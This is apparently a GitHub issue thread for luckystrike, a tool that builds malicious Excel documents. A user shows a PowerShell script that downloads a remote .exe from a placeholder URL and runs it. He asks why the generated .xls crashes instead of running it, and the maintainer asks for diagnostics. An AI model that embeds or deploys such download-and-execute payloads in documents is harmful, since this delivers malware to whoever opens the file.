### ISSUE TITLE
Problem embedding PowerShell Script

### ISSUE THREAD

**Issue by pedrodj** [Shellntel/luckystrike#11]
Hi,

for test purpose I'm trying to make luckystrike compile a .xls that download a remote .exe.

For doing this I'm using an external .ps1 file
********************
$down = New-Object System.Net.WebClient
$url  = 'http://url/test/test.exe'
$file = 'test.exe';
$down.DownloadFile($url,$file);
$exec = New-Object -com shell.application
$exec.shellexecute($file);
********************

If I execute this script, it download and run .exe regurally: If i try to use it as Powershell command into payload, the final .xls open regurally in Excel but then it crash, not downloading and opening nothing.

Any suggestion ? :)

Thank you :)

**Comment by curi0usJack** [comment]
1) Can you post a screenshot of the error/crash please?
2) Run this & post the output please: https://gist.github.com/curi0usJack/2878be90d0f2f45d728b8e8f22bb56fd

Thanks!

**Comment by pedrodj** [comment]
POWERSHELL VERSION:     5.0.10586.117
EXCEL VERSION:          14.0
OFFICE BITNESS:         x86
OFFICE REGKEY:          HKLM:\SOFTWARE\Microsoft\Office\14.0\Outlook
WINDOWS VERSION:        6.1.7601.65536
WINDOWS BITNESS:        64 bit
ISADMIN:                False

**Comment by curi0usJack** [comment]
1) Can you post a screenshot of the error/crash please?
